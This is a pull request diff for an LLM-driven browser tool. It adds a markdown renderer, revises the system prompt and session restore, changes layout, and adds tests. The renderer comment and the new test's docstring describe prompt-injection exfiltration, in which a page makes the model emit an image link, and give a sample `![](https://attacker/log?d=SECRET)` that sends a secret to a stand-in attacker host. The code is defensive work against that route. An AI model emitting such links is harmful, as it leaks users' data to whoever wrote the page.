### PR TITLE
The answer pane draws markdown, in words and with room to breathe (0.22.0)

### DIFF
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -4,7 +4,7 @@ build-backend = "hatchling.build"
 
 [project]
 name = "aihawk"
-version = "0.21.0"
+version = "0.22.0"
 description = "Drive a stealth browser with an LLM from one command"
 readme = "README.md"
 requires-python = ">=3.11"

--- a/src/aihawk/agent.py
+++ b/src/aihawk/agent.py
@@ -23,8 +23,10 @@ SYSTEM_PROMPT = (
     "browser_read_text / browser_snapshot / browser_read_html before acting on "
     "them. A person may be watching the browser while you work, so prefer one "
     "clear action at a time over long chains. When the task is done, reply with "
-    "the answer in plain text and do NOT call any more tools. Report only what "
-    "the page actually shows."
+    "the answer and do NOT call any more tools. Report only what the page "
+    "actually shows. Write the answer as prose, with markdown where it carries "
+    "structure the reader needs: a heading, a list, a table. No emoji, and no "
+    "tick or cross in front of a line - say what happened in words."
 )
 
 Say = Callable[[str, str], Awaitable[None]]

--- a/src/aihawk/brain.py
+++ b/src/aihawk/brain.py
@@ -20,7 +20,7 @@ from __future__ import annotations
 from typing import Awaitable, Callable
 
 from . import actions_help
-from .agent import Conversation
+from .agent import SYSTEM_PROMPT, Conversation
 from .link import Link
 
 Say = Callable[[str, str], Awaitable[None]]
@@ -76,9 +76,21 @@ class OpenRouterBrain(Brain):
         Written into the conversation this brain already has rather than by
         building a new one: the client and the model are this process's, and the
         file has no business deciding either.
+
+        ⛔ AND THE SYSTEM MESSAGE IS THIS PROCESS'S TOO, FOR THE SAME REASON.
+        A saved transcript carries the instructions as they were on the day the
+        conversation started, so restoring it wholesale put an OLD prompt back
+        and every change to `SYSTEM_PROMPT` reached new conversations only.
+        Found on 2026-09-08 while telling the model to stop decorating answers
+        with ticks and crosses: the change would have left every conversation
+        anybody had open still doing it, forever, and the file would have won
+        against the code with nothing saying so. The transcript is what was
+        SAID; the instructions are what this build asks for.
         """
         if messages:
-            self._convo.messages = list(messages)
+            self._convo.messages = (
+                [{"role": "system", "content": SYSTEM_PROMPT}]
+                + [m for m in messages if m.get("role") != "system"])
         if usage:
             self._convo.usage.update(usage)
 

--- a/src/aihawk/web.py
+++ b/src/aihawk/web.py
@@ -240,8 +240,51 @@ code,pre,.g,.meta,.badge,#url,#tok{
       background:var(--hover); border:1px solid var(--line-1);
       border-radius:var(--r-lg) var(--r-lg) var(--r-sm) var(--r-lg);
       padding:9px 13px; white-space:pre-wrap; overflow-wrap:anywhere }
-.say   { color:var(--fg-2); white-space:pre-wrap; padding-left:var(--indent) }
-.answer{ color:var(--fg);   white-space:pre-wrap; padding-left:var(--indent) }
+/* ⛔ THE PRE-WRAP MOVED DOWN, and that is the whole reason the blocks below can
+   exist. While the answer was one pre-wrap box, every blank line the model left
+   between two paragraphs was drawn as an empty line - so a paragraph margin on
+   top of it would space the answer twice. Now the parser eats the blank lines
+   and the margins do the spacing, while pre-wrap survives exactly where a line
+   break belongs to the author: inside a paragraph, an item, a cell. */
+.say   { color:var(--fg-2); padding-left:var(--indent) }
+.answer{ color:var(--fg);   padding-left:var(--indent) }
+.say > :first-child, .answer > :first-child{ margin-top:0 }
+.say > :last-child,  .answer > :last-child { margin-bottom:0 }
+.md-p{ margin:0 0 var(--s3); white-space:pre-wrap; overflow-wrap:anywhere }
+h3.md-h, h4.md-h, h5.md-h, h6.md-h{
+      margin:var(--s4) 0 var(--s2); font-family:var(--sans); font-weight:600;
+      line-height:1.3; color:var(--fg) }
+/* `##` is what a model writes most, so h4 is the one that has to read as a
+   heading and not as a bold line: at 14px it was the size of the body text
+   under it, which is a hierarchy only the weight was carrying. */
+h3.md-h{ font-size:17px }
+h4.md-h{ font-size:15px }
+h5.md-h, h6.md-h{ font-size:13px; color:var(--fg-2) }
+/* A fenced block inside an answer is already inside the answer's indent, and
+   `.out` carries its own for the tool output it was written for: the two
+   stacked, so code sat a step to the right of the prose describing it. */
+.say > .out, .answer > .out{ margin-left:0 }
+.md-l{ margin:0 0 var(--s3); padding-left:1.4em }
+.md-l .md-l{ margin:var(--s1) 0 0 }        /* a nested list continues its item */
+.md-i{ margin:0 0 var(--s1); white-space:pre-wrap; overflow-wrap:anywhere }
+.md-i::marker{ color:var(--fg-4) }
+.md-q{ margin:0 0 var(--s3); padding-left:var(--s3); color:var(--fg-2);
+       box-shadow:inset 2px 0 0 var(--line-3) }
+.md-hr{ margin:var(--s4) 0; border:0; border-top:1px solid var(--line-2) }
+/* display:block so a wide table scrolls inside itself instead of widening the
+   whole conversation, which on this layout would push the live pane off. */
+.md-t{ display:block; overflow-x:auto; max-width:100%; margin:0 0 var(--s3);
+       border-collapse:collapse; font-size:var(--t-mono) }
+.md-t th, .md-t td{ padding:4px 14px 4px 0; text-align:left; vertical-align:top;
+                    white-space:pre-wrap; border-bottom:1px solid var(--line-1) }
+.md-t th{ font-family:var(--sans); font-size:var(--t-label); font-weight:600;
+          text-transform:uppercase; letter-spacing:.04em; color:var(--fg-3) }
+/* A link is SHOWN and never made clickable: this pane draws words chosen by
+   whatever page the agent last read, and the browser it drives is right there.
+   The address is printed next to them so an injected one is legible. */
+.lk  { color:var(--fg) }
+.href{ color:var(--fg-4); font:12px/1.5 var(--mono); overflow-wrap:anywhere }
+.href::before{ content:" " }
 .orph  { display:flex; gap:8px; font-size:var(--t-mono); color:var(--err);
          background:rgba(232,131,107,.08); border-radius:var(--r-sm);
          box-shadow:inset 2px 0 0 var(--err); padding:6px 10px }
@@ -532,35 +575,136 @@ form{ padding:var(--s3) var(--s4) var(--s4); border-top:1px solid var(--line-1);
 
 <script>
 const $ = id => document.getElementById(id);
+/* ---- markdown, and the gate lifts everything down to the end of `rich` ----
+   These lines are the only ones in this file a JavaScript engine runs during
+   the tests: `test_the_answer_pane_draws_markdown.py` cuts the region out and
+   executes it against a DOM small enough to print. The markers exist so that
+   cut is exact - moving them means moving what is under test. */
 const el = (t,c,x) => { const e = document.createElement(t);
                         if(c) e.className = c; if(x != null) e.textContent = x; return e; };
 
 /* Markdown to NODES, never to a string of HTML.
-   The model answered `The main heading says **"Example Domain"**` and the page
-   drew the asterisks, because everything here is built with textContent - and
-   that invariant is not an oversight to correct, it is the reason this pane is
-   safe. The text arriving here was written by a model that has just read
-   arbitrary web pages, so it is chosen by whoever wrote the last page it
-   visited. Putting it through innerHTML is the documented road to exfiltration
-   by injected image, and no amount of sanitising makes that road shorter than
-   this one.
+   The text arriving here was written by a model that has just read arbitrary
+   web pages, so it is chosen by whoever wrote the last page it visited. Putting
+   it through innerHTML is the documented road to exfiltration by injected
+   image, and no amount of sanitising makes that road shorter than this one.
    So: the marks become elements, built by hand, and the text between them stays
    text. A `<script>` in the answer is still drawn as the characters of a
    script, because it never stops being a text node.
-   Deliberately absent: images, which are the exfiltration vector itself, and
-   links, which this pane has no reason to make clickable when the browser it
-   drives is right there. */
+   Images are absent on purpose - they are the exfiltration vector itself, and
+   an `<img>` fetches its source the instant it enters the document, with no
+   click and no error needed. A link is drawn but never made clickable, and its
+   destination is PRINTED rather than hidden behind words, so an injected
+   address is legible instead of invisible. */
 function inline(text, into){
-  for(const part of text.split(/(\*\*[^*\n]+\*\*|`[^`\n]+`|\*[^*\n]+\*)/)){
+  for(const part of text.split(/(\*\*[^*\n]+\*\*|`[^`\n]+`|\*[^*\n]+\*|!?\[[^\]\n]*\]\([^()\s]*\))/)){
     if(!part) continue;
     const two = part.length > 4 && part.startsWith('**') && part.endsWith('**');
     const tick = part.length > 2 && part.startsWith('`') && part.endsWith('`');
     const one = part.length > 2 && !two && part.startsWith('*') && part.endsWith('*');
+    const link = /^!?\[([^\]\n]*)\]\(([^()\s]*)\)$/.exec(part);
     if(two)       into.appendChild(el('strong', null, part.slice(2, -2)));
     else if(tick) into.appendChild(el('code', null, part.slice(1, -1)));
     else if(one)  into.appendChild(el('em', null, part.slice(1, -1)));
+    else if(link){ if(link[1]) into.appendChild(el('span','lk', link[1]));
+                   if(link[2]) into.appendChild(el('span','href', link[2])); }
     else          into.appendChild(document.createTextNode(part));
   }
+}
+
+/* The block marks, which are most of what a model writes: it answers in
+   headings and lists far more often than in the three inline marks this pane
+   understood until now, and every one of them was drawn as its own characters -
+   `## Roles` arrived on screen as a hash, a hash and a space. */
+const HEAD   = /^(#{1,6})\s+(.*)$/;
+const BULLET = /^(\s*)[-*+]\s+(.*)$/;
+const NUMBER = /^(\s*)\d+[.)]\s+(.*)$/;
+const QUOTE  = /^\s*>\s?(.*)$/;
+const RULE   = /^\s*([-*_])\s*(?:\1\s*){2,}$/;
+const CELLS  = /\|/;
+const DASHES = /^[\s:|-]*-[\s:|-]*$/;
+
+function blocks(text, into){
+  const lines = text.split('\n');
+  let i = 0;
+  while(i < lines.length){
+    const line = lines[i];
+    if(!line.trim()){ i++; continue; }
+    const head = HEAD.exec(line);
+    if(head){
+      /* `#` lands on h3: the page's own title is above this pane, and an answer
+         that opened at h1 would outrank it in the document outline. */
+      const h = el('h' + Math.min(head[1].length + 2, 6), 'md-h');
+      inline(head[2], h); into.appendChild(h); i++; continue;
+    }
+    if(RULE.test(line)){ into.appendChild(el('hr','md-hr')); i++; continue; }
+    if(QUOTE.test(line)){
+      const held = [];
+      while(i < lines.length && QUOTE.test(lines[i])) held.push(QUOTE.exec(lines[i++])[1]);
+      const q = el('blockquote','md-q');
+      blocks(held.join('\n'), q);          /* a quote holds blocks like any other */
+      into.appendChild(q); continue;
+    }
+    if(CELLS.test(line) && i + 1 < lines.length && DASHES.test(lines[i + 1])
+       && lines[i + 1].includes('-')){ i = tableAt(lines, i, into); continue; }
+    if(BULLET.test(line) || NUMBER.test(line)){ i = listAt(lines, i, into); continue; }
+    /* ⛔ THE FIRST LINE IS TAKEN WITHOUT ASKING, and that is what makes this
+       loop finish. Every branch above consumes; this one is the floor, so if
+       its condition ever excluded the line that got here the walker would sit
+       on it forever building empty paragraphs - a hung tab, not a bad render.
+       Measured while mutating the list branch away: the browser stops. */
+    const held = [lines[i++]];
+    while(i < lines.length && lines[i].trim() && !HEAD.test(lines[i])
+          && !RULE.test(lines[i]) && !QUOTE.test(lines[i])
+          && !BULLET.test(lines[i]) && !NUMBER.test(lines[i])) held.push(lines[i++]);
+    const p = el('p','md-p');
+    inline(held.join('\n'), p);
+    into.appendChild(p);
+  }
+}
+
+/* Both of these return the line to carry on from, so the walker above never has
+   to guess how much they ate - a block parser that advances by one and hopes is
+   how a list ends up inside itself. */
+function listAt(lines, i, into){
+  const first = BULLET.exec(lines[i]) || NUMBER.exec(lines[i]);
+  const base = first[1].length;
+  const ordered = !BULLET.test(lines[i]);
+  const box = el(ordered ? 'ol' : 'ul', 'md-l');
+  let item = null;
+  while(i < lines.length && lines[i].trim()){
+    const mark = BULLET.exec(lines[i]) || NUMBER.exec(lines[i]);
+    if(!mark){
+      /* A line under an item and not marked is the rest of that item. */
+      if(!item) break;
+      item.appendChild(document.createTextNode('\n' + lines[i].trim()));
+      i++; continue;
+    }
+    if(mark[1].length > base){ i = listAt(lines, i, item || box); continue; }
+    if(mark[1].length < base || !BULLET.test(lines[i]) !== ordered) break;
+    item = el('li','md-i');
+    inline(mark[2], item);
+    box.appendChild(item);
+    i++;
+  }
+  into.appendChild(box);
+  return i;
+}
+
+function tableAt(lines, i, into){
+  const cells = row => row.replace(/^\s*\|/,'').replace(/\|\s*$/,'').split('|');
+  const box = el('table','md-t');
+  const head = el('tr','md-r');
+  for(const c of cells(lines[i])) inline(c.trim(), head.appendChild(el('th')));
+  box.appendChild(head);
+  i += 2;                                   /* the header row and its dashes */
+  while(i < lines.length && lines[i].trim() && CELLS.test(lines[i])){
+    const tr = el('tr','md-r');
+    for(const c of cells(lines[i])) inline(c.trim(), tr.appendChild(el('td')));
+    box.appendChild(tr); i++;
+  }
+  into.appendChild(box);
+  return i;
 }
 
 function rich(text){
@@ -570,10 +714,11 @@ function rich(text){
      is prose that changes shape when the closing fence arrives. */
   text.split('```').forEach((block, i) => {
     if(i % 2) frag.appendChild(el('pre','out', block.replace(/^[a-z]*\n/i, '')));
-    else if(block) inline(block, frag);
+    else if(block.trim()) blocks(block, frag);
   });
   return frag;
 }
+/* ---- end markdown ---- */
 
 /* Raw tool names read as the machine's word order. One table, two tenses. */
 const VERB = {
@@ -1690,9 +1835,30 @@ def build_app(link: Link, sessions: "Sessions") -> Starlette:
                 # with no turn ceiling the stop button is the only thing that
                 # ends such a run. So it is sent as what it is, the present, and
                 # only when true: a page starts out believing it is idle.
+                # ⛔ AND IT IS SENT WHEN FALSE TOO, WHICH IS NOT SYMMETRY FOR
+                # ITS OWN SAKE: without it the last thing the model said was
+                # never drawn. The page holds one narration line back so that a
+                # sentence with tool calls after it reads as their lead-in and
+                # one with nothing after it reads as the answer, and the event
+                # that resolves that lookahead is the end of the turn - which
+                # is a `busy` going false. A replay carries no `busy` at all, so
+                # a page reopening a FINISHED conversation sat holding its last
+                # sentence forever. Measured on the developer's own saved
+                # session: 257 events ending in `said`, and the answer to the
+                # last thing they asked was not on the screen.
+                # Marked as replay so it flushes without animating one row and
+                # without redrawing the session list, exactly like the events
+                # above it.
+                # The two are NOT one line with a conditional inside: the live
+                # one must arrive unflagged or the page calls `waited()` where
+                # it should call `waiting()`, and a run in progress would lose
+                # its clock.
                 if joining_a_run:
                     yield b"data: " + json.dumps(
                         {"kind": "busy", "text": "1"}).encode() + b"\n\n"
+                else:
+                    yield b"data: " + json.dumps(
+                        {"kind": "busy", "text": "0", "replay": True}).encode() + b"\n\n"
                 # The meter is state too, and it was silent for exactly the
                 # same reason: a page joining after a turn ended showed no
                 # context size at all, on the one screen whose whole job is to

--- a/src/aihawk/web.py
+++ b/src/aihawk/web.py
@@ -181,7 +181,15 @@ code,pre,.g,.meta,.badge,#url,#tok{
 .chat .x:hover{ background:var(--line-2); color:var(--fg) }
 @media (max-width:900px){ #rail{ display:none } }
 
-#left { width:44%; min-width:380px; display:flex; flex-direction:column;
+/* ⛔ A PERCENTAGE ALONE GIVES THE SURPLUS TO THE WRONG PANE. The conversation
+   stops getting better past its measure cap - a wider column is a longer line,
+   not more text - while the browser view is a picture and gets better with
+   every pixel. At 44% of a 2560 screen this column was 1126px around a 634px
+   thread: 460px of nothing, taken from the pane that could have used it. The
+   clamp holds the column at what the thread plus its gutters actually need and
+   hands the rest to the right. Only desktops run this, so the floor is the
+   narrow end of a laptop and there is no phone case to carry. */
+#left { width:clamp(420px, 44%, 760px); display:flex; flex-direction:column;
         position:relative; border-right:1px solid var(--line-1) }
 #right{ flex:1; min-width:0; display:flex; flex-direction:column; background:var(--well) }
 #head { display:flex; align-items:center; gap:10px; padding:var(--s3) var(--s4);

--- a/src/aihawk/web.py
+++ b/src/aihawk/web.py
@@ -202,8 +202,19 @@ code,pre,.g,.meta,.badge,#url,#tok{
    the measure and 680px is only one screen's worth of it: on a 1920 window the
    same column ran to about 92 characters, past the 80 the WCAG asks for and
    well past the 50 to 75 the readability research settles on. `ch` follows the
-   font instead of guessing at it. */
-#thread{ max-width:72ch; margin:0 auto }
+   font instead of guessing at it.
+
+   ⛔ BUT THE CAP WAS CENTRED, AND THE MEASURE IT CAPS IS NOT THE ONE IT SETS.
+   Centring splits the slack in two and puts half of it on the LEFT, where a
+   reader sees it as the column having been pushed away from the edge for no
+   reason - said in exactly those words on 2026-09-08, and visible in a
+   screenshot as 185px of nothing before the first character. And the number
+   itself was measuring the wrong thing: an answer carries `--indent` of its
+   own, about 4.7ch, so a 72ch container was giving 67 characters of prose,
+   under the range the comment above cites rather than over it. 84 minus the
+   indent lands at 79, inside the 80. Left aligned, so what is left over sits
+   on one side, next to the browser pane, instead of framing the text. */
+#thread{ max-width:84ch; margin:0 }
 
 /* Bottom-pinning with no scroll handler and no epsilon: the sentinel is the only
    anchor the browser may keep, so content inserted before it pushes the view
@@ -250,10 +261,18 @@ code,pre,.g,.meta,.badge,#url,#tok{
 .answer{ color:var(--fg);   padding-left:var(--indent) }
 .say > :first-child, .answer > :first-child{ margin-top:0 }
 .say > :last-child,  .answer > :last-child { margin-bottom:0 }
-.md-p{ margin:0 0 var(--s3); white-space:pre-wrap; overflow-wrap:anywhere }
+/* ⛔ THE RHYTHM IS THE FIRST THING THAT WAS WRONG once the blocks existed, and
+   it read as "everything is stuck together". The gap between two items was 4px
+   under a line 22px tall, so an item that wrapped ran into the next one and a
+   list of six looked like one paragraph with dots in it. The scale here is a
+   ladder rather than one value: 8 inside a list, 16 between blocks, 24 above a
+   heading - a heading needs more space ABOVE it than below, because the space
+   is what says the section starts, and a heading floating equidistant between
+   two paragraphs belongs to neither. */
+.md-p{ margin:0 0 var(--s4); white-space:pre-wrap; overflow-wrap:anywhere }
 h3.md-h, h4.md-h, h5.md-h, h6.md-h{
-      margin:var(--s4) 0 var(--s2); font-family:var(--sans); font-weight:600;
-      line-height:1.3; color:var(--fg) }
+      margin:calc(var(--s4) + var(--s2)) 0 var(--s2); font-family:var(--sans);
+      font-weight:600; line-height:1.35; color:var(--fg) }
 /* `##` is what a model writes most, so h4 is the one that has to read as a
    heading and not as a bold line: at 14px it was the size of the body text
    under it, which is a hierarchy only the weight was carrying. */
@@ -264,18 +283,22 @@ h5.md-h, h6.md-h{ font-size:13px; color:var(--fg-2) }
    `.out` carries its own for the tool output it was written for: the two
    stacked, so code sat a step to the right of the prose describing it. */
 .say > .out, .answer > .out{ margin-left:0 }
-.md-l{ margin:0 0 var(--s3); padding-left:1.4em }
-.md-l .md-l{ margin:var(--s1) 0 0 }        /* a nested list continues its item */
-.md-i{ margin:0 0 var(--s1); white-space:pre-wrap; overflow-wrap:anywhere }
+/* 1.9em, not the 1.4 it started at: at that width the marker sat almost under
+   the first letter and a list read as prose with dots in it. The step of the
+   indent has to be bigger than the space between two words or it is not a
+   step. */
+.md-l{ margin:0 0 var(--s4); padding-left:1.9em }
+.md-l .md-l{ margin:var(--s2) 0 0 }        /* a nested list continues its item */
+.md-i{ margin:0 0 var(--s2); white-space:pre-wrap; overflow-wrap:anywhere }
 .md-i::marker{ color:var(--fg-4) }
-.md-q{ margin:0 0 var(--s3); padding-left:var(--s3); color:var(--fg-2);
+.md-q{ margin:0 0 var(--s4); padding:2px 0 2px var(--s4); color:var(--fg-2);
        box-shadow:inset 2px 0 0 var(--line-3) }
-.md-hr{ margin:var(--s4) 0; border:0; border-top:1px solid var(--line-2) }
+.md-hr{ margin:var(--s5) 0; border:0; border-top:1px solid var(--line-2) }
 /* display:block so a wide table scrolls inside itself instead of widening the
    whole conversation, which on this layout would push the live pane off. */
-.md-t{ display:block; overflow-x:auto; max-width:100%; margin:0 0 var(--s3);
+.md-t{ display:block; overflow-x:auto; max-width:100%; margin:0 0 var(--s4);
        border-collapse:collapse; font-size:var(--t-mono) }
-.md-t th, .md-t td{ padding:4px 14px 4px 0; text-align:left; vertical-align:top;
+.md-t th, .md-t td{ padding:6px 18px 6px 0; text-align:left; vertical-align:top;
                     white-space:pre-wrap; border-bottom:1px solid var(--line-1) }
 .md-t th{ font-family:var(--sans); font-size:var(--t-label); font-weight:600;
           text-transform:uppercase; letter-spacing:.04em; color:var(--fg-3) }

--- a/tests/conftest.py
+++ b/tests/conftest.py
@@ -41,6 +41,7 @@ file forget. What one test leaves behind is not an input to the next one.
 from __future__ import annotations
 
 import os
+import sys
 import tempfile
 
 import pytest
@@ -64,11 +65,23 @@ def _the_server_remembers_nothing_from_the_last_test():
     Emptied rather than replaced: a test that monkeypatches one of them still
     gets its own, and a test that does not gets an empty one instead of
     whatever the file before it left.
-    """
-    from aihawk.mcp import server
 
-    for held in ("_focus", "_loaded", "_seen_tabs", "_tabs_owed"):
-        got = getattr(server, held, None)
-        if got is not None:
-            got.clear()
+    ⛔ LOOKED UP IN `sys.modules`, NEVER IMPORTED, and the first version got
+    that wrong. An autouse fixture runs for EVERY test in the repository, so
+    importing the server here made every test depend on the `mcp` package - and
+    two CI jobs install pytest and nothing else, because what they check is a
+    version number and a set of release pages. Both went red with
+    `ModuleNotFoundError: No module named 'mcp'` at fixture setup, on tests that
+    have no business knowing the server exists.
+
+    Asking `sys.modules` is also the more honest question: this state can only
+    be dirty if something imported the module, so if it is not there, there is
+    nothing to clear.
+    """
+    server = sys.modules.get("aihawk.mcp.server")
+    if server is not None:
+        for held in ("_focus", "_loaded", "_seen_tabs", "_tabs_owed"):
+            got = getattr(server, held, None)
+            if got is not None:
+                got.clear()
     yield

--- a/tests/conftest.py
+++ b/tests/conftest.py
@@ -1,4 +1,4 @@
-"""No test writes into the real machine's aihawk directory.
+"""No test reads or writes the real machine's aihawk directory.
 
 ⛔ MEASURED, BY DOING IT. Sessions became persistent on 2026-09-08, and the
 first run of the tests that exercise them wrote three real files into
@@ -12,12 +12,63 @@ at all: the tests that touch this were written by somebody who knew about it,
 and the ones written next year will not be. `AIHAWK_HOME` is the single knob
 `store.home()` reads first, so pointing it at a temporary directory for every
 test closes the whole class rather than the two cases somebody remembered.
+
+⛔ AND THE FIRST VERSION OF THAT ONLY COVERED TEST BODIES, WHICH LET THE SAME
+DEFECT BACK IN THROUGH THE DOOR NEXT TO IT. A fixture runs when a test runs; a
+module-level line runs when the file is IMPORTED, which is before any fixture
+exists. `test_asking_who_you_are.py` asks the server one question at import
+time, and that question reads the saved session - so on a machine where
+somebody actually uses AIHawk, collection alone loaded the real one. Measured
+on this machine: two tests in `test_addressing.py` went red because the
+developer's live session had its focus on a browser called `b-kw-pharmacist`,
+and the server module carried that, plus eight real URLs, into every test that
+followed. Green in isolation, red in the suite, and green on CI - because CI
+has no saved session to read. A suite whose verdict depends on what the
+developer left open is not reporting on the product.
+
+So the home is redirected TWICE, and the two are not redundant:
+
+* at import, below, so no line that runs during collection can reach the real
+  directory. This one is a single directory for the whole run, which is enough
+  because its only job is to be empty;
+* per test, in the fixture, so two tests cannot reach each other's.
+
+And the module state the server keeps ACROSS calls is emptied per test for the
+same reason the environment variable is set in one place: several test files
+already reset those dicts by hand, which is the duplication that lets the next
+file forget. What one test leaves behind is not an input to the next one.
 """
 from __future__ import annotations
 
+import os
+import tempfile
+
 import pytest
+
+#: Set at IMPORT, not in a fixture: conftest is imported before the test modules
+#: are, so this is in place before any module-level line can ask the server a
+#: question. `mkdtemp` and not `tmp_path`, which is a fixture and does not exist
+#: yet at this point.
+os.environ["AIHAWK_HOME"] = tempfile.mkdtemp(prefix="aihawk-tests-")
 
 
 @pytest.fixture(autouse=True)
 def _aihawk_home_is_disposable(tmp_path, monkeypatch):
     monkeypatch.setenv("AIHAWK_HOME", str(tmp_path / "aihawk-home"))
+
+
+@pytest.fixture(autouse=True)
+def _the_server_remembers_nothing_from_the_last_test():
+    """The four things the server module holds between calls.
+
+    Emptied rather than replaced: a test that monkeypatches one of them still
+    gets its own, and a test that does not gets an empty one instead of
+    whatever the file before it left.
+    """
+    from aihawk.mcp import server
+
+    for held in ("_focus", "_loaded", "_seen_tabs", "_tabs_owed"):
+        got = getattr(server, held, None)
+        if got is not None:
+            got.clear()
+    yield

--- a/tests/test_agent_loop.py
+++ b/tests/test_agent_loop.py
@@ -923,3 +923,67 @@ async def test_two_calls_to_the_same_tool_keep_distinct_ids_and_results():
     results = tool_messages(model.requests[1])
     assert [m["tool_call_id"] for m in results] == ["c1", "c2"]
     assert [m["content"] for m in results] == ["read #1", "read #2"]
+
+
+def test_the_answer_is_asked_for_in_words_and_without_emoji():
+    """⛔ THE DECORATION COMES FROM THE MODEL, SO THE FIX IS THE PROMPT.
+
+    Asked for on 2026-09-08, looking at a real conversation: ticks, crosses and
+    a stop sign in front of most lines of an answer. Nothing in the interface
+    puts them there - the model writes them, because nothing told it not to, and
+    a renderer that stripped them would be a filter over a habit instead of an
+    instruction against it.
+
+    The prompt also has to say that markdown is welcome: it said "plain text",
+    which was true while the pane drew the marks as characters and became a lie
+    the moment it stopped.
+
+    Known-bad, two: drop the emoji sentence, and put an emoji in the prompt
+    itself - a prompt that decorates while asking for no decoration teaches the
+    habit it forbids.
+    """
+    assert "emoji" in SYSTEM_PROMPT.lower(), (
+        "nothing tells the model to answer without emoji, and it will: %r"
+        % SYSTEM_PROMPT)
+    assert "markdown" in SYSTEM_PROMPT.lower(), (
+        "the pane draws markdown now, and the prompt has to say so or the model "
+        "is being asked for something else")
+    assert "plain text" not in SYSTEM_PROMPT.lower(), (
+        "asking for plain text and for markdown in the same breath is two "
+        "instructions that disagree")
+    decorative = [c for c in SYSTEM_PROMPT
+                  if ord(c) > 0x2100 or c in "\u2705\u274c\u26d4"]
+    assert not decorative, (
+        "the prompt asks for no emoji while using %r" % decorative)
+
+
+def test_a_reopened_conversation_gets_THIS_build_instructions():
+    """⛔ A SAVED TRANSCRIPT CARRIES THE PROMPT OF THE DAY IT STARTED, and
+    restoring it wholesale let the file win against the code.
+
+    Found while adding the sentence that tells the model not to decorate answers
+    with ticks and crosses: the change would have reached new conversations
+    only, and every one anybody already had open would have kept doing it
+    forever, with nothing anywhere saying why. The transcript is what was SAID;
+    the instructions are what this build asks for, and there is exactly one
+    place they live.
+
+    Known-bad: `self._convo.messages = list(messages)`, which is what it did.
+    """
+    from aihawk.brain import OpenRouterBrain
+
+    brain = OpenRouterBrain(client=object(), model="m")
+    brain.remember([
+        {"role": "system", "content": "an old instruction, with emoji please"},
+        {"role": "user", "content": "open the listings"},
+        {"role": "assistant", "content": "three roles"},
+    ])
+
+    system = [m for m in brain.messages if m["role"] == "system"]
+    assert len(system) == 1, "a restored transcript must not stack up prompts"
+    assert system[0]["content"] == SYSTEM_PROMPT, (
+        "the conversation came back under the instructions saved in the file, "
+        "so changing the prompt reaches new conversations only")
+    assert brain.messages[0]["role"] == "system", "the prompt has to lead"
+    assert [m["content"] for m in brain.messages[1:]] == [
+        "open the listings", "three roles"], "the transcript itself was altered"

--- a/tests/test_the_answer_pane_draws_markdown.py
+++ b/tests/test_the_answer_pane_draws_markdown.py
@@ -1,0 +1,411 @@
+"""What the answer pane MAKES of what the model wrote.
+
+⛔ EVERY OTHER TEST OF THIS PAGE READS IT AS A STRING, and a string cannot say
+what a renderer produces. That gap is not theoretical here: the pane understood
+three inline marks and nothing else, so a model answering in headings and lists
+- which is how a model answers - had `## Roles` drawn on screen as a hash, a
+hash and a space, for the whole life of the interface. Every test was green,
+because a scan for `function rich` finds a function and never asks what it
+returns.
+
+So this file RUNS it. The machine and every CI runner have node, so the region
+between the two markers in the page is cut out and executed against a DOM small
+enough to print, and the assertions are about the tree that comes back.
+
+⛔ AND THE SECOND HALF IS THE ONE THAT MATTERS MOST. This pane draws words
+chosen by whoever wrote the last page the agent visited: a page can address the
+model directly, and the model can repeat it. If any of this ever reaches
+innerHTML, `![](https://attacker/log?d=SECRET)` becomes an `<img>` that fetches
+itself the moment it enters the document - no click, no script, no error
+handler needed. That is the documented road (Slack AI 2024, GitLab Duo 2025,
+EchoLeak 2025, Superhuman 2026) and the shim below closes it by force: assigning
+innerHTML throws, and every tag the renderer creates is recorded so `img` and
+`a` can be asserted absent rather than hoped absent.
+"""
+from __future__ import annotations
+
+import json
+import shutil
+import subprocess
+
+import pytest
+
+from aihawk.web import PAGE
+
+NODE = shutil.which("node")
+FIRST = "const el = (t,c,x)"
+LAST = "/* ---- end markdown ---- */"
+
+#: A DOM with three methods and one rule. `innerHTML` is not merely absent: it
+#: refuses, so a renderer that reached for it fails here by name instead of by
+#: a downstream assertion that would read as a formatting bug.
+SHIM = r"""
+const MADE = [];
+class Node {
+  constructor(tag){ this.tag = tag; this.kids = []; this.className = ''; this._text = null; }
+  get textContent(){
+    return this._text != null ? this._text : this.kids.map(k => k.textContent).join('');
+  }
+  set textContent(v){ this._text = String(v); this.kids = []; }
+  appendChild(n){
+    if(this._text != null){ this.kids.push(new Txt(this._text)); this._text = null; }
+    this.kids.push(n); return n;
+  }
+  append(...xs){ for(const x of xs) this.appendChild(typeof x === 'string' ? new Txt(x) : x); }
+}
+class Txt extends Node { constructor(t){ super('#text'); this._text = t; } }
+Object.defineProperty(Node.prototype, 'innerHTML', {
+  set(){ throw new Error('INNERHTML: this pane must build nodes, never parse HTML'); },
+  get(){ return undefined; },
+});
+const document = {
+  createElement: t => { MADE.push(t); return new Node(t); },
+  createTextNode: t => new Txt(t),
+  createDocumentFragment: () => new Node('#fragment'),
+};
+function tree(n){
+  return n.tag === '#text'
+    ? {tag: '#text', text: n._text, kids: []}
+    : {tag: n.tag, cls: n.className,
+       text: n._text, kids: n.kids.map(tree)};
+}
+"""
+
+
+def draw(text: str) -> dict:
+    """Run the page's own renderer over `text` and return the tree it built."""
+    body = PAGE[PAGE.index(FIRST):PAGE.index(LAST)]
+    js = (SHIM + body
+          + "\nconst out = tree(rich(%s));" % json.dumps(text)
+          + "\nprocess.stdout.write(JSON.stringify({tree: out, made: MADE}));")
+    # ⛔ A DEADLINE, BECAUSE THE FAILURE THIS PARSER CAN HAVE IS NOT A WRONG
+    # TREE, IT IS NO TREE. The walker advances only if some branch consumes a
+    # line; one that consumed nothing would spin forever building empty
+    # paragraphs, which in a browser is a frozen tab. Measured while mutating
+    # the list branch away. Without the deadline the whole suite hangs there
+    # instead of one test going red with a sentence.
+    try:
+        done = subprocess.run([NODE, "-e", js], capture_output=True, text=True,
+                              encoding="utf-8", timeout=30)
+    except subprocess.TimeoutExpired:
+        raise AssertionError(
+            "the renderer did not finish on %r: a block the walker recognises "
+            "but no branch consumes leaves it on the same line forever, which "
+            "in a browser is a page that stops responding" % text)
+    assert done.returncode == 0, (
+        "the answer pane's renderer threw while drawing %r:\n%s" % (text, done.stderr))
+    return json.loads(done.stdout)
+
+
+def tags(node, out=None):
+    out = [] if out is None else out
+    out.append(node["tag"])
+    for k in node["kids"]:
+        tags(k, out)
+    return out
+
+
+def find(node, tag):
+    """Every node with this tag, depth first."""
